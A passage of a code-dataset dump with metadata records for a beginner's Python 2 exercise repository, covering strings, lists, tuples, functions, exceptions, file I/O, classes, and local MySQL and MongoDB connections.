"no_license", "max_line_length": 52, "num_lines": 10, "path": "/Day2/Function/Fun10.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def 
printme(a,*b):\n \"This prints a passed string into this function\"\n print a\n for c in b:\n print c\n \n\n# Now you can call printme function\nprintme(50)\nprintme(1,20,30,40)\n" }, { "alpha_fraction": 0.5384615659713745, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 12, "blob_id": "9ac4ffa655d774b4cf6aea8d89bf3c86e4b58905", "content_id": "3d9faa922d87965f2a14109813c5eba37f4d3aa0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 13, "license_type": "no_license", "max_line_length": 12, "num_lines": 1, "path": "/README.md", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "# Python_2.x\n" }, { "alpha_fraction": 0.6578947305679321, "alphanum_fraction": 0.6578947305679321, "avg_line_length": 18.5, "blob_id": "803110e1a6dfc17bb9dc5cd217511e7249120a71", "content_id": "5b8e18c94b33bb8a7b2378a3931960fd558d0c50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "no_license", "max_line_length": 22, "num_lines": 2, "path": "/Day2/String/String9.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=\"hello world\"\nprint \"c:\\\\etc\\init.d\"" }, { "alpha_fraction": 0.53125, "alphanum_fraction": 0.625, "avg_line_length": 10, "blob_id": "f421d67fb35f6a99f3d132a89ac3affdb58727c2", "content_id": "1a841845f010358ea931562c5596f1bed8d6d6b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num11.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10.0\nb=int(a)\nprint b, type(b)" }, { "alpha_fraction": 0.5897436141967773, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 12.333333015441895, "blob_id": "11c9a83f9cc088c22784d86596a2dae8ef5cab4e", "content_id": "07b0e3621f90f2de61346022a9cbd4b1c024dc93", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39, "license_type": "no_license", "max_line_length": 22, "num_lines": 3, "path": "/Day2/String/String5.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=\"hello world\"\n\nprint a[:6] + 'python'" }, { "alpha_fraction": 0.7119565010070801, "alphanum_fraction": 0.7228260636329651, "avg_line_length": 17.5, "blob_id": "cdd9e97608d99af1ac5db4381175faf1e372b955", "content_id": "fabb05424c410cfab1c1ad526d55e922d9464577", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 184, "license_type": "no_license", "max_line_length": 36, "num_lines": 10, "path": "/Day2/String/String1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from string import capitalize, lower\na=\"hello world\"\nprint capitalize(a)\nprint a.center(15,'s')\nprint a.title()\n#print min(a)\nprint max(a)\na=\" a HELLO DEAR\"\nprint lower(a)\nprint min(a)" }, { "alpha_fraction": 0.7804877758026123, "alphanum_fraction": 0.8211382031440735, "avg_line_length": 30, "blob_id": "5ed3d359b4c082ad0fe347eb3756e31d8e19b6d2", "content_id": "fc0cb4704c9092237e21b3ed08dceefda40a9020", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 123, "license_type": "no_license", "max_line_length": 58, "num_lines": 4, "path": "/Day5/Database/MongoDb/Mongo2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import pymongo\nmyclient=pymongo.MongoClient(\"mongodb://localhost:27017/\")\nmydb=myclient[\"mydbtest\"]\nprint myclient.mydbtest" }, { "alpha_fraction": 0.4714285731315613, "alphanum_fraction": 0.4952380955219269, "avg_line_length": 12.933333396911621, "blob_id": "96a42f2076abeeff2ebc791c6819bc2a82bcb27a", "content_id": "ae98f36d5ecd909ba9c43f2e2189e0059f1653f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 210, "license_type": "no_license", "max_line_length": 21, "num_lines": 15, "path": "/Day3/Module/Area/area.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def circle(r): \n print 3.14*r*r \n return \n \ndef square(l): \n print l*l \n return \n \ndef rectangle(l,b): \n print l*b \n return \n \ndef triangle(b,h): \n print 0.5*b*h \n return " }, { "alpha_fraction": 0.6285714507102966, "alphanum_fraction": 0.6857143044471741, "avg_line_length": 11, "blob_id": "d18099abbe91504808f6e7faeaea5aec9aeb5d76", "content_id": "1bbc669bfcceb65995d47b72f42aa7a191e4e9e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num6.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10L\nb=complex(a)\nprint b, type(b)" }, { "alpha_fraction": 0.574999988079071, "alphanum_fraction": 0.574999988079071, "avg_line_length": 9.25, "blob_id": "ac89c013817d9ddf443f95fd8e75c613b40793f6", "content_id": "562f337198e37b741093af1ba3dcfc4e7692319d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40, "license_type": "no_license", "max_line_length": 13, "num_lines": 4, "path": "/Day4/Class/Cls3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class sk:\n a=\"hello\"\ns=sk()\nprint s.a" }, { "alpha_fraction": 0.6194690465927124, "alphanum_fraction": 0.6283186078071594, "avg_line_length": 18, "blob_id": "2383891845c2ac574c7b82e05773f52457677ba3", "content_id": "abd3e8954064c53d326b5e0f0b14b083c75b9687", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 113, "license_type": "no_license", "max_line_length": 35, "num_lines": 6, "path": "/Day5/In_Op/OS/os1/os.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import 
os\n#a=os.mkdir(\"os1/a\")\n#b=os.getcwd()\nos.open(\"hey.txt\",\"r \")\nb=os.rename(\"hey.txt\", \"hello.txt\")\nprint b" }, { "alpha_fraction": 0.5098039507865906, "alphanum_fraction": 0.6274510025978088, "avg_line_length": 11.75, "blob_id": "b953d048cebbabd769f136898cd85115c27ca3ca", "content_id": "4154f91c7c07d36c94c8f357adec2841c24e1faa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 25, "num_lines": 8, "path": "/Day2/List/List12.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=[\"py\",'hello']\na.append(b)\nprint a\n\nprint a.count(10)\na.extend(b)\nprint a\n" }, { "alpha_fraction": 0.5945945978164673, "alphanum_fraction": 0.5945945978164673, "avg_line_length": 18, "blob_id": "cc1fcc008d11d9c0ca0717628359086fc21bebd1", "content_id": "60134c711b4508d0b2acce941ea14a9f9422423d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37, "license_type": "no_license", "max_line_length": 26, "num_lines": 2, "path": "/Day3/Module/Phone/MsgFile.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def msg():\n print \"I'm Pots Phone\"" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.6984127163887024, "avg_line_length": 14.625, "blob_id": "6ae432edbac35d096ea76e66f5fd002be16b0930", "content_id": "4d3fbe53bbd4c888356541a3589d25e18a404169", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 126, "license_type": "no_license", "max_line_length": 39, "num_lines": 8, "path": "/Day2/Number/Num1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from math import log, log10, sqrt, modf\na=10\nprint log(a)\nprint log10(a)\na=100.2\nprint sqrt(a)\nprint pow(a, 2)\nprint modf(a)\n\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 
0.593406617641449, "avg_line_length": 22, "blob_id": "29974b229902cfee9d44574861129454969723e6", "content_id": "0da2115400c6a391d8d1292289925815d1e78afa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 53, "num_lines": 4, "path": "/Day2/Dictionary/Dict1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={'name':'jsi','id':101,'contact':123456,'id':\"102\"}\nb={'company':\"jsi\"}\na.clear()\nprint a" }, { "alpha_fraction": 0.5526315569877625, "alphanum_fraction": 0.5526315569877625, "avg_line_length": 15.428571701049805, "blob_id": "415a15a98f4b59f65644b825b47d227af1d70044", "content_id": "0a9175c3dfcf6f31ac6115177057c5ced1090154", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 114, "license_type": "no_license", "max_line_length": 31, "num_lines": 7, "path": "/Day5/In_Op/Io3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "try:\n a=open(\"myfile.txt\",\"r\")\n b=a.read()\n print b\nexcept:\n print \"file going to close\"\n a.close()" }, { "alpha_fraction": 0.6222222447395325, "alphanum_fraction": 0.644444465637207, "avg_line_length": 17.85714340209961, "blob_id": "246bd662e24e53dba3df6ab0458fb2596352ec55", "content_id": "5370f4285f1016f862ba0dae5716beac9c073fee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 135, "license_type": "no_license", "max_line_length": 50, "num_lines": 7, "path": "/Day5/Exception/Excep3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "try:\n a=10/0\n print \"exception occur\"\nfinally :\n print \"this statement is raising an exception\"\n#else:\n print \"welcome\" " }, { "alpha_fraction": 0.6176470518112183, "alphanum_fraction": 0.6764705777168274, "avg_line_length": 10.666666984558105, "blob_id": "9db9dc6bec011d8eeaf53b392f20be21e0b8d46f", 
"content_id": "018db577bfde14030168c73239834c50a9ba548d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num5.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10\nb=complex(a)\nprint b, type(b)" }, { "alpha_fraction": 0.3529411852359772, "alphanum_fraction": 0.5686274766921997, "avg_line_length": 9.399999618530273, "blob_id": "c7709ab7a0561919959135b9bb417c6ac7fad436", "content_id": "2b06714006db811a4a3df3d0f8f4f046e298b725", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 25, "num_lines": 5, "path": "/Day2/List/List5.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=\"py\"\n\ndel a [1]\nprint a" }, { "alpha_fraction": 0.5121951103210449, "alphanum_fraction": 0.6097561120986938, "avg_line_length": 13, "blob_id": "8086ae8b831a046a8fba9f137a27735e3182f854", "content_id": "9875dd5b31c1a8f7c8158b04ef5ced7506aa58c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41, "license_type": "no_license", "max_line_length": 19, "num_lines": 3, "path": "/Day2/Function/Fun4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def fun1(a):\n print \"hello\",a\nfun1(10)" }, { "alpha_fraction": 0.48500001430511475, "alphanum_fraction": 0.48500001430511475, "avg_line_length": 17.272727966308594, "blob_id": "ee034608bb398dc4a1d99bf96607c429bbb3dff4", "content_id": "84438daf81330e6e66a2cb24e3c0f5d7b2775011", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "no_license", "max_line_length": 37, "num_lines": 11, "path": "/Day5/Exception/Excep9.py", "repo_name": "skatara/Python_2.x", 
"src_encoding": "UTF-8", "text": "try:\n \n try:\n a=open(\"test.txt\",\"r\")\n a.write(\"hey this is python\")\n finally:\n \n print \"file is closed\"\n a.close()\nexcept:\n print \"file can not be read\"" }, { "alpha_fraction": 0.40740740299224854, "alphanum_fraction": 0.5925925970077515, "avg_line_length": 12.25, "blob_id": "3938056019fdf573559dfe97b37182e49ca34b86", "content_id": "b6eba494d38e607fb8606d49eb3d876fb6a13874", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 54, "license_type": "no_license", "max_line_length": 25, "num_lines": 4, "path": "/Day2/List/List10.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=\"py\"\na.append(b)\nprint a\n\n" }, { "alpha_fraction": 0.6470588445663452, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 10.666666984558105, "blob_id": "7653ef07e560630f18424a34aa9257686b4850eb", "content_id": "fa79e59b49657c31bb393715e4bfd6a00e3bced1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34, "license_type": "no_license", "max_line_length": 14, "num_lines": 3, "path": "/Day2/String/String4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=\"hello\"\nb=\"python\"\nprint a+b" }, { "alpha_fraction": 0.5972222089767456, "alphanum_fraction": 0.7361111044883728, "avg_line_length": 11.166666984558105, "blob_id": "c0040e6e536e62d08ee66c20f6bfad0e509463f7", "content_id": "904880e497de98a3a3591734a1e4ad5a1700c3f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 72, "license_type": "no_license", "max_line_length": 18, "num_lines": 6, "path": "/Day3/Module/Area/area2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from area import *\n\ncircle(10)\nsquare(20)\nrectangle(20,20)\ntriangle(5,2)" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 
0.6233766078948975, "avg_line_length": 10.142857551574707, "blob_id": "1622c6996977a10e3faa1d9ab26e1d4365ee6ead", "content_id": "1d2202d357cbd6621a1737e3ac3590786b0f4256", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 77, "license_type": "no_license", "max_line_length": 17, "num_lines": 7, "path": "/Day2/Function/Fun15.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "b=20\ndef fun(a):\n print a\n return a\na=fun(10)\nprint \"outside\",b\nprint a" }, { "alpha_fraction": 0.5765765905380249, "alphanum_fraction": 0.5765765905380249, "avg_line_length": 17.66666603088379, "blob_id": "14a0c086f73145a56b38d6731a7acf85c9d25217", "content_id": "27465b87ae67ce63e17a766d0b4c440fb3f8a08e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 111, "license_type": "no_license", "max_line_length": 31, "num_lines": 6, "path": "/Day5/In_Op/Io2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "try:\n a=open(\"my.txt\",\"w\")\n a.write(\"hello python\")\nexcept:\n print \"file going to close\"\n a.close()" }, { "alpha_fraction": 0.5724138021469116, "alphanum_fraction": 0.5724138021469116, "avg_line_length": 13.600000381469727, "blob_id": "28c47b82c5916530522dc25e7acfa5a7c438a800", "content_id": "b8324538ab7bd74e6ba1a8dad9d9f6898a5d50c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "no_license", "max_line_length": 23, "num_lines": 10, "path": "/Day4/Inheritance/Inher3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class A:\n def myprint(self):\n print \"myprint\"\nclass B(A):\n def display(self):\n print \"display\"\n\nb=B()\nb.display()\nb.myprint()" }, { "alpha_fraction": 0.698924720287323, "alphanum_fraction": 0.698924720287323, "avg_line_length": 22.375, "blob_id": "0fba073bdc01ecb25f2b048416ccf7a670bf2ade", 
"content_id": "e50675f0a4d583ddf1e147960c2b9dbdb2ca2e04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 186, "license_type": "no_license", "max_line_length": 39, "num_lines": 8, "path": "/Day5/Database/mysqlDB/Db3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import mysql.connector\nmydb=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\" \n )\ncursor=mydb.cursor()\ncursor.execute(\"CREATE DATABASE vikas\")" }, { "alpha_fraction": 0.2916666567325592, "alphanum_fraction": 0.5416666865348816, "avg_line_length": 8.600000381469727, "blob_id": "1124218bc173d68445822fd7bf374cfd402fd40a", "content_id": "004ac92200f56d04a576e1478d384baa3272088a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 48, "license_type": "no_license", "max_line_length": 18, "num_lines": 5, "path": "/Day2/Tuple/Tup7.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nb=(200,500)\n\nc=a + b\nprint c\n" }, { "alpha_fraction": 0.7540983557701111, "alphanum_fraction": 0.7704917788505554, "avg_line_length": 14.5, "blob_id": "b76907379e03f93cbc6700ef5526c2789fda5519", "content_id": "6cc1e9f1a725888ca8d6df9e6a3874dbfb071c3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 61, "license_type": "no_license", "max_line_length": 41, "num_lines": 4, "path": "/com/sk/mod1/mfile.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from com.sk.sfile1 import vikas, adisplay\n\nvikas()\nadisplay()" }, { "alpha_fraction": 0.4444444477558136, "alphanum_fraction": 0.6222222447395325, "avg_line_length": 14.333333015441895, "blob_id": "dcd3211618e9a751ab49900568584979b75a2730", "content_id": "d9edbc6c49ca3064406b246e08c2db5f181f41fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 45, "license_type": "no_license", "max_line_length": 18, "num_lines": 3, "path": "/Day2/Tuple/Tup3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nprint a[0:3]\nprint type(a)" }, { "alpha_fraction": 0.6116504669189453, "alphanum_fraction": 0.708737850189209, "avg_line_length": 13.714285850524902, "blob_id": "6856032232787c16247bd8430a055f6864344d53", "content_id": "dc10387c0c48dd0b034e993c8898d32141c3db5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 103, "license_type": "no_license", "max_line_length": 33, "num_lines": 7, "path": "/Day2/Number/Num31.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from math import log, log10, sqrt\na=10\nprint log(a)\nprint log10(a)\na=100\nprint sqrt(a)\nprint pow(a, 2)\n" }, { "alpha_fraction": 0.6060606241226196, "alphanum_fraction": 0.6060606241226196, "avg_line_length": 7.5, "blob_id": "c9e13835353310e52091a56b91c1cd1b493c8d3a", "content_id": "0ac62bbfe03ca8505229d1b079ee75f0d1b5c886", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33, "license_type": "no_license", "max_line_length": 9, "num_lines": 4, "path": "/Day4/Class/Cls2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class sk:\n pass\ns=sk()\nprint s" }, { "alpha_fraction": 0.6730769276618958, "alphanum_fraction": 0.6730769276618958, "avg_line_length": 30.200000762939453, "blob_id": "44eb8063f9f0344eb2f99d18b6142f2e51dcff5f", "content_id": "01b8f9b389ebf534b756bc424dcf60715c7b5633", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 156, "license_type": "no_license", "max_line_length": 41, "num_lines": 5, "path": "/Day5/In_Op/Io9.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=open(\"new file.txt\",\"w+\")\nprint \"please write a file: 
\"\na.write(raw_input(\"Enter You String : \"))\nprint \"file is written\"\nprint \"file is close\",a.close()\n" }, { "alpha_fraction": 0.29487180709838867, "alphanum_fraction": 0.5769230723381042, "avg_line_length": 8.875, "blob_id": "89d5f6f3ae2e3cd088a2bf8296083901eeaa9be3", "content_id": "2be4649df8cc08ee4f6fc4f861d3f4ada6a46ff2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 78, "license_type": "no_license", "max_line_length": 18, "num_lines": 8, "path": "/Day2/Tuple/Tup4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nb=20\n\nprint a[0:3]\na=[10,20,30,'hey']\nb=20\na[0]=500\nprint a" }, { "alpha_fraction": 0.5164835453033447, "alphanum_fraction": 0.5604395866394043, "avg_line_length": 14.333333015441895, "blob_id": "77d6a7edbeb05cd124387cb266ed8ec3a9a63a15", "content_id": "939b9487a13ddf9c56f975c2b189f9e8fdf3e01c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 22, "num_lines": 6, "path": "/Day2/Function/Fun13.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def fun(b,c):\n a=b+c\n print \"inside \", a\n return a\na=fun(10, 30)\nprint \"outside\",a" }, { "alpha_fraction": 0.5806451439857483, "alphanum_fraction": 0.6451612710952759, "avg_line_length": 9.666666984558105, "blob_id": "191606b930a5878c29d4bd446e8825df353b0bdb", "content_id": "1fa316d9dbab859d91b5ec75e6a3c6cf31cc97c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num7.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10L\nb=int(a)\nprint b, type(b)" }, { "alpha_fraction": 0.28947368264198303, "alphanum_fraction": 0.6052631735801697, "avg_line_length": 18.5, "blob_id": 
"747b6c66b0a9677d5811e1eabd6851d02851d7e3", "content_id": "feef60123eb19e4f17292b6657926e3032845ddd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "no_license", "max_line_length": 25, "num_lines": 2, "path": "/Day2/List/List3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nprint a[2:5]" }, { "alpha_fraction": 0.3333333432674408, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 8.600000381469727, "blob_id": "ba5589ee6768713691d5372cef21cdbed78ffb69", "content_id": "dd880a46e617f792da4e4521f32e5b81d7296160", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 48, "license_type": "no_license", "max_line_length": 18, "num_lines": 5, "path": "/Day2/Tuple/Tup8.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nb=(200,500)\n\ndel b\nprint a,b\n" }, { "alpha_fraction": 0.5614973306655884, "alphanum_fraction": 0.5828877091407776, "avg_line_length": 12.357142448425293, "blob_id": "03685f4dd271b6464b2e1c71821b6ede17564ea6", "content_id": "113287e5d220cf38291d68c0d24c1b54a2529acc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 187, "license_type": "no_license", "max_line_length": 41, "num_lines": 14, "path": "/Day5/In_Op/Io1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "<<<<<<< HEAD\nimport os\n#print \"file path change\",os.chdir(\"str\")\nos.rmdir(\"str/a\")\n=======\n\na=open(\"my.txt\",\"r\")\nb=a.read()\nprint a.mode\nprint a.name\n\nprint b\na.close()\n>>>>>>> Sept18_19\n" }, { "alpha_fraction": 0.5454545617103577, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 10.5, "blob_id": "8a9ab4d1a4d6dca9567fe764519199e841f51e31", "content_id": "13666577081b39fa6598354b715dc99996c92e09", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 22, "license_type": "no_license", "max_line_length": 12, "num_lines": 2, "path": "/Day2/String/String3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=\"hello\"\nprint a[0:2]" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 22.66666603088379, "blob_id": "e9de73b583be98a5bf021d697b80fa4131b5f794", "content_id": "302b55c47c0b6520db57fdbfed80018045aa45dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 70, "license_type": "no_license", "max_line_length": 40, "num_lines": 3, "path": "/Day5/In_Op/OS/Io1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import os\nprint \"file path change\",os.chdir(\"str\")\nprint os.mkdir(\"a\")" }, { "alpha_fraction": 0.5151515007019043, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 15.5, "blob_id": "95ca75417d94861e4c09591489125d1757014bf0", "content_id": "2c33eb77fb2e88851f982e56503dfdf6d2350e18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33, "license_type": "no_license", "max_line_length": 17, "num_lines": 2, "path": "/Day2/Function/Fun11.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=lambda a,b:a+b;\nprint a(20,30)\n" }, { "alpha_fraction": 0.44736841320991516, "alphanum_fraction": 0.6052631735801697, "avg_line_length": 18.25, "blob_id": "8a77aa5130c61405c12282d3e99b622679ac86a5", "content_id": "cb48b22144a27fb8caa91e642ddbf610e422aad8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 76, "license_type": "no_license", "max_line_length": 42, "num_lines": 4, "path": "/Day2/Dictionary/Dict11.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={'name':'jsi','id':101,'contact':123456}\na['id']=102\ndel a('name')\nprint a" }, { 
"alpha_fraction": 0.5099999904632568, "alphanum_fraction": 0.6299999952316284, "avg_line_length": 11.625, "blob_id": "57ed5d319bdbea9a3023fdbbeb463bbf2c236ed0", "content_id": "605b1a4f899a1b824b28927ec56272529e217d9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 25, "num_lines": 8, "path": "/Day2/List/List18.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=[\"py\",'hello']\na.reverse()\nprint a\na.remove(20)\nprint a\na.sort()\nprint a" }, { "alpha_fraction": 0.6610169410705566, "alphanum_fraction": 0.7457627058029175, "avg_line_length": 19, "blob_id": "47a91763dee5a664ac66e2b764e29b2d6b645b36", "content_id": "70982582d05b1a2a5603b09b0287977e386115f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 59, "license_type": "no_license", "max_line_length": 29, "num_lines": 3, "path": "/Day3/A/call.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from Day3.MD import Add,Hello\nAdd.add(10, 20)\nHello.hello()" }, { "alpha_fraction": 0.7345971465110779, "alphanum_fraction": 0.758293867111206, "avg_line_length": 34.16666793823242, "blob_id": "9ee374fa49ae33e02fcb6dc7971e0c0f10227f03", "content_id": "826361ac95bfe34471a6d759b131fbc2aab01e8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 211, "license_type": "no_license", "max_line_length": 58, "num_lines": 6, "path": "/Day5/Database/MongoDb/Mongo3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import pymongo\n\"\"\" list_collection_names() like table in sql\"\"\"\nmyclient=pymongo.MongoClient(\"mongodb://localhost:27017/\")\nmydb=myclient[\"mydbtest\"]\nmycol=mydb[\"custormers\"] \nprint mydb.list_collection_names()\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 
0.7142857313156128, "avg_line_length": 10, "blob_id": "28188f3edd471b41e186bc24611a17437aeb9a5a", "content_id": "091adf65a4a4e59e0c0e57b66b9e770c1001f846", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21, "license_type": "no_license", "max_line_length": 12, "num_lines": 2, "path": "/Day3/B/B.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import A\n#A.Amodule()" }, { "alpha_fraction": 0.6875, "alphanum_fraction": 0.6875, "avg_line_length": 23.5, "blob_id": "2093a81fcc210d3043d87955761fa608bc6e0f6c", "content_id": "70f88b5d532a8857cf33aae680c7337f7eb99050", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 48, "license_type": "no_license", "max_line_length": 31, "num_lines": 2, "path": "/Day3/Module/Phone/music.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def musicplay():\n print \"I'm musicplay Phone\"" }, { "alpha_fraction": 0.6854838728904724, "alphanum_fraction": 0.7661290168762207, "avg_line_length": 19.66666603088379, "blob_id": "01a5157817821d5337121d150802c496e7bc962d", "content_id": "24ad897e09a9585abd94bec4270c66cfcf669f08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 124, "license_type": "no_license", "max_line_length": 28, "num_lines": 6, "path": "/Day3/Module/Test.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "#import addition\n#import Add,Multiple\nimport Add,addition,Multiple\nAdd.add(10, 20)\naddition.add(20, 30)\nMultiple.mult(2, 3)\n" }, { "alpha_fraction": 0.6558441519737244, "alphanum_fraction": 0.6753246784210205, 